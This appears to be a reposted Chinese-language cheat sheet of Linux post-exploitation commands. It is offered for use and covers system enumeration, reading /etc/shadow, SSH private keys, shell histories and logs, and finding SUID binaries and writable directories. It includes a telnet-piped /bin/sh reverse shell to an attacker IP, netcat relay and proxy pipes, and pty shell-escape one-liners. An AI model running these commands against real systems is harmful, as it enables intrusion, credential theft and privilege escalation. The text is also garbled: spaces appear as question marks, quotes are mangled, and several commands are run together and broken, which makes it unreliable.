awk linux 获取端口号_Linux提权后获取敏感信息命令
如果不能執(zhí)行的可能是不同類(lèi)型的linux。
系統(tǒng)版本?
cat?/etc/issue
cat?/etc/*-release
cat?/etc/lsb-release
cat?/etc/redhat-release
內(nèi)核版本?
cat?/proc/version
uname?-a
uname?-mrs
rpm?-q?kernel
dmesg?|?grep?Linux
ls?/boot?|?grep?vmlinuz
環(huán)境變量?
cat?/etc/profile
cat?/etc/bashrc
cat?~/.bash_profile
cat?~/.bashrc
cat?~/.bash_logout
env
set
打印機(jī)?
lpstat?-a
正在運(yùn)行什么服務(wù)?具有什么用戶(hù)權(quán)限?
ps?aux
ps?-ef
top
cat?/etc/service
哪些服務(wù)具有root的權(quán)限?
ps?aux?|?grep?root
ps?-ef?|?grep?root
安裝了哪些應(yīng)用程序?他們是什么版本?
ls?-alh?/usr/bin/
ls?-alh?/sbin/
dpkg?-l
rpm?-qa
ls?-alh?/var/cache/apt/archivesO
ls?-alh?/var/cache/yum/
Service設(shè)置,有任何的錯(cuò)誤配置嗎?是否有任何脆弱性插件?
cat?/etc/syslog.conf
cat?/etc/chttp.conf
cat?/etc/lighttpd.conf
cat?/etc/cups/cupsd.conf
cat?/etc/inetd.conf
cat?/etc/apache2/apache2.conf
cat?/etc/my.conf
cat?/etc/httpd/conf/httpd.conf
cat?/opt/lampp/etc/httpd.conf
ls?-aRl?/etc/?|?awk?‘$1?~?/^.*r.*/
主機(jī)上有哪些工作計(jì)劃?
crontab?-l
ls?-alh?/var/spool/cron
ls?-al?/etc/?|?grep?cron
ls?-al?/etc/cron*
cat?/etc/cron*
cat?/etc/at.allow
cat?/etc/at.deny
cat?/etc/cron.allow
cat?/etc/cron.deny
cat?/etc/crontab
cat?/etc/anacrontab
cat?/var/spool/cron/crontabs/root
主機(jī)上可能有哪些純文本用戶(hù)名和密碼?
grep?-i?user?[filename]
grep?-i?pass?[filename]
grep?-C?5?"password"?[filename]
find?.?-name?"*.php"?-print0?|?xargs?-0?grep?-i?-n?"var?$password"???#?Joomla
NIC(s),系統(tǒng)有哪些?它是連接到哪一個(gè)網(wǎng)絡(luò)?
/sbin/ifconfig?-a
cat?/etc/network/interfaces
cat?/etc/sysconfig/network
網(wǎng)絡(luò)配置設(shè)置是什么?網(wǎng)絡(luò)中有什么樣的服務(wù)器?
cat?/etc/resolv.conf
cat?/etc/sysconfig/network
cat?/etc/networks
iptables?-L
hostname
dnsdomainname
其他用戶(hù)主機(jī)與系統(tǒng)的通信?
lsof?-i
lsof?-i?:80
grep?80?/etc/services
netstat?-antup
netstat?-antpx
netstat?-tulpn
chkconfig?--list
chkconfig?--list?|?grep?3:on
緩存?IP和/或MAC地址?
arp?-e
route
/sbin/route?-nee
數(shù)據(jù)包可能嗅探嗎?監(jiān)聽(tīng)流量
#?tcpdump?tcp?dst?[ip]?[port]?and?tcp?dst?[ip]?[port]
tcpdump?tcp?dst?192.168.1.7?80?and?tcp?dst?10.2.2.222?21
你如何get一個(gè)shell?你如何與系統(tǒng)進(jìn)行交互?
nc?-lvp?4444????#?Attacker.?輸入?(命令)
nc?-lvp?4445????#?Attacker.?輸出(結(jié)果)
telnet?[atackers?ip]?44444?|?/bin/sh?|?[local?ip]?44445????#?在目標(biāo)系統(tǒng)上.?使用?攻擊者的IP!
如何端口轉(zhuǎn)發(fā)?(端口重定向)
# fpipe
#?FPipe.exe?-l?[local?port]?-r?[remote?port]?-s?[local?port]?[local?IP]
FPipe.exe?-l?80?-r?80?-s?80?192.168.1.7
#ssh
#?ssh?-[L/R]?[local?port]:[remote?ip]:[remote?port]?[local?user]@[local?ip]
ssh?-L?8080:127.0.0.1:80?root@192.168.1.7????#?Local?Port
ssh?-R?8080:127.0.0.1:80?root@192.168.1.7????#?Remote?Port
#mknod
#?mknod?backpipe?p?;?nc?-l?-p?[remote?port]?<?backpipe??|?nc?[local?IP]?[local?port]?>backpipe
mknod?backpipe?p?;?nc?-l?-p?8080?<?backpipe?|?nc?10.1.1.251?80?>backpipe????#?Port?Relay
mknod?backpipe?p?;?nc?-l?-p?8080?0?&?<?backpipe?|?tee?-a?inflow?|?nc?localhost?80?|?tee?-a?outflow?1>backpipe????#?Proxy?(Port?80?to?8080)
mknod
backpipe?p?;?nc?-l?-p?8080?0?&?<?backpipe?|?tee?-a?inflow?|?nc
localhost?80?|?tee?-a?outflow?&?1>backpipe????#?Proxy?monitor?(Port?80?to?8080)
本地,遠(yuǎn)程發(fā)送命令
ssh?-D?127.0.0.1:9050?-N?[username]@[ip]
proxychains?ifconfig
你是誰(shuí)?哪個(gè)id登錄?誰(shuí)已經(jīng)登錄?還有誰(shuí)在這里?誰(shuí)可以做什么呢?
id
who
w
last
cat?/etc/passwd?|?cut?-d:????#?List?of?users
grep?-v?-E?"^#"?/etc/passwd?|?awk?-F:?'$3?==?0?{?print?$1}'???#?List?of?super?users
awk?-F:?'($3?==?"0")?{print}'?/etc/passwd???#?List?of?super?users
cat?/etc/sudoers
sudo?-l
可以找到什么敏感文件?
cat?/etc/passwd
cat?/etc/group
cat?/etc/shadow
ls?-alh?/var/mail/
什么有趣的文件在home/directorie(S)里?如果有權(quán)限訪(fǎng)問(wèn)
ls?-ahlR?/root/
ls?-ahlR?/home/
是否有任何密碼,腳本,數(shù)據(jù)庫(kù),配置文件或日志文件?密碼默認(rèn)路徑和位置
cat?/var/apache2/config.inc
cat?/var/lib/mysql/mysql/user.MYD
cat?/root/anaconda-ks.cfg
用戶(hù)做過(guò)什么?是否有任何密碼呢?他們有沒(méi)有編輯什么?
cat?~/.bash_history
cat?~/.nano_history
cat?~/.atftp_history
cat?~/.mysql_history
cat?~/.php_history
可以找到什么樣的用戶(hù)信息
cat?~/.bashrc
cat?~/.profile
cat?/var/mail/root
cat?/var/spool/mail/root
private-key 信息能否被發(fā)現(xiàn)?
cat?~/.ssh/authorized_keys
cat?~/.ssh/identity.pub
cat?~/.ssh/identity
cat?~/.ssh/id_rsa.pub
cat?~/.ssh/id_rsa
cat?~/.ssh/id_dsa.pub
cat?~/.ssh/id_dsa
cat?/etc/ssh/ssh_config
cat?/etc/ssh/sshd_config
cat?/etc/ssh/ssh_host_dsa_key.pub
cat?/etc/ssh/ssh_host_dsa_key
cat?/etc/ssh/ssh_host_rsa_key.pub
cat?/etc/ssh/ssh_host_rsa_key
cat?/etc/ssh/ssh_host_key.pub
cat?/etc/ssh/ssh_host_key
哪些用戶(hù)可以寫(xiě)配置文件在/ etc /?能夠重新配置服務(wù)?
ls?-aRl?/etc/?|?awk?‘$1?~?/^.*w.*/'?2>/dev/null?????#?Anyone
ls?-aRl?/etc/?|?awk?’$1?~?/^..w/'?2>/dev/null????????#?Owner
ls?-aRl?/etc/?|?awk?‘$1?~?/^.....w/'?2>/dev/null????#?Group
ls?-aRl?/etc/?|?awk?’;$1?~?/w.$/'?2>/dev/null??????????#?Other
find?/etc/?-readable?-type?f?2>/dev/null?????????????????????????#?Anyone
find?/etc/?-readable?-type?f?-maxdepth?1?2>/dev/null???#?Anyone
在/ var /有什么可以發(fā)現(xiàn)?
ls?-alh?/var/log
ls?-alh?/var/mail
ls?-alh?/var/spool
ls?-alh?/var/spool/lpd
ls?-alh?/var/lib/pgsql
ls?-alh?/var/lib/mysql
cat?/var/lib/dhcp3/dhclient.leases
網(wǎng)站上的任何隱藏配置/文件?配置文件與數(shù)據(jù)庫(kù)信息?
ls?-alhR?/var/www/
ls?-alhR?/srv/www/htdocs/
ls?-alhR?/usr/local/www/apache22/data/
ls?-alhR?/opt/lampp/htdocs/
ls?-alhR?/var/www/html/
有什么在日志文件里?(什么能夠幫助到“本地文件包含”?)
cat?/etc/httpd/logs/access_log
cat?/etc/httpd/logs/access.log
cat?/etc/httpd/logs/error_log
cat?/etc/httpd/logs/error.log
cat?/var/log/apache2/access_log
cat?/var/log/apache2/access.log
cat?/var/log/apache2/error_log
cat?/var/log/apache2/error.log
cat?/var/log/apache/access_log
cat?/var/log/apache/access.log
cat?/var/log/auth.log
cat?/var/log/chttp.log
cat?/var/log/cups/error_log
cat?/var/log/dpkg.log
cat?/var/log/faillog
cat?/var/log/httpd/access_log
cat?/var/log/httpd/access.log
cat?/var/log/httpd/error_log
cat?/var/log/httpd/error.log
cat?/var/log/lastlog
cat?/var/log/lighttpd/access.log
cat?/var/log/lighttpd/error.log
cat?/var/log/lighttpd/lighttpd.access.log
cat?/var/log/lighttpd/lighttpd.error.log
cat?/var/log/messages
cat?/var/log/secure
cat?/var/log/syslog
cat?/var/log/wtmp
cat?/var/log/xferlog
cat?/var/log/yum.log
cat?/var/run/utmp
cat?/var/webmin/miniserv.log
cat?/var/www/logs/access_log
cat?/var/www/logs/access.log
ls?-alh?/var/lib/dhcp3/
ls?-alh?/var/log/postgresql/
ls?-alh?/var/log/proftpd/
ls?-alh?/var/log/samba/
如果命令限制,你可以打出哪些突破它的限制?
python?-c?'import?pty;pty.spawn("/bin/bash")'
echo?os.system('/bin/bash')
/bin/sh?-i
如何安裝文件系統(tǒng)?
mount
df?-h
是否有掛載的文件系統(tǒng)?
cat?/etc/fstab
什么是高級(jí)Linux文件權(quán)限使用?Sticky bits, SUID 和GUID
find?/?-perm?-1000?-type?d?2>/dev/null????#?Sticky?bit?-?Only?the?owner?of?the?directory?or?the?owner?of?a?file?can?delete?or?rename?here
find?/?-perm?-g=s?-type?f?2>/dev/null????#?SGID?(chmod?2000)?-?run?as?the??group,?not?the?user?who?started?it.
find?/?-perm?-u=s?-type?f?2>/dev/null????#?SUID?(chmod?4000)?-?run?as?the??owner,?not?the?user?who?started?it.
find?/?-perm?-g=s?-o?-perm?-u=s?-type?f?2>/dev/null????#?SGID?or?SUID
for?i?in?`locate?-r?"bin$"`;?do?find?$i?(?-perm?-4000?-o?-perm?-2000?)?-type?f?2>/dev/null;?done????#
Looks?in?'common'?places:?/bin,?/sbin,?/usr/bin,?/usr/sbin,
/usr/local/bin,?/usr/local/sbin?and?any?other?*bin,?for?SGID?or?SUID
(Quicker?search)
#
findstarting?at?root?(/),?SGIDorSUID,?not?Symbolic?links,?only?3
folders?deep,?list?with?more?detail?and?hideany?errors?(e.g.?permission
denied)
find/-perm?-g=s-o-perm?-4000!?-type?l-maxdepth?3?-exec?ls?-ld?{}?;2>/dev/null
在哪些目錄可以寫(xiě)入和執(zhí)行呢?幾個(gè)“共同”的目錄:/ tmp目錄,/var / tmp目錄/ dev /shm目錄
find?/?-writable?-type?d?2>/dev/null????????#?world-writeable?folders
find?/?-perm?-222?-type?d?2>/dev/null??????#?world-writeable?folders
find?/?-perm?-o+w?-type?d?2>/dev/null????#?world-writeable?folders
find?/?-perm?-o+x?-type?d?2>/dev/null????#?world-executable?folders
find?/?(?-perm?-o+w?-perm?-o+x?)?-type?d?2>/dev/null???#?world-writeable?&?executable?folders
Any?"problem"?files?可寫(xiě)的的,“沒(méi)有使用"的文件
find?/?-xdev?-type?d?(?-perm?-0002?-a?!?-perm?-1000?)?-print???#?world-writeable?files
find?/dir?-xdev?(?-nouser?-o?-nogroup?)?-print???#?Noowner?files
準(zhǔn)備和查找漏洞利用代碼
安裝了什么開(kāi)發(fā)工具/語(yǔ)言/支持?
find?/?-name?perl*
find?/?-name?python*
find?/?-name?gcc*
find?/?-name?cc
如何上傳文件?
find?/?-name?wget
find?/?-name?nc*
find?/?-name?netcat*
find?/?-name?tftp*
find?/?-name?ftp
總結(jié)
以上是生活随笔為你收集整理的awk linux 获取端口号_Linux提权后获取敏感信息命令的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 后视镜喷漆多少钱?
- 下一篇: mysql 5.7 full_MySQL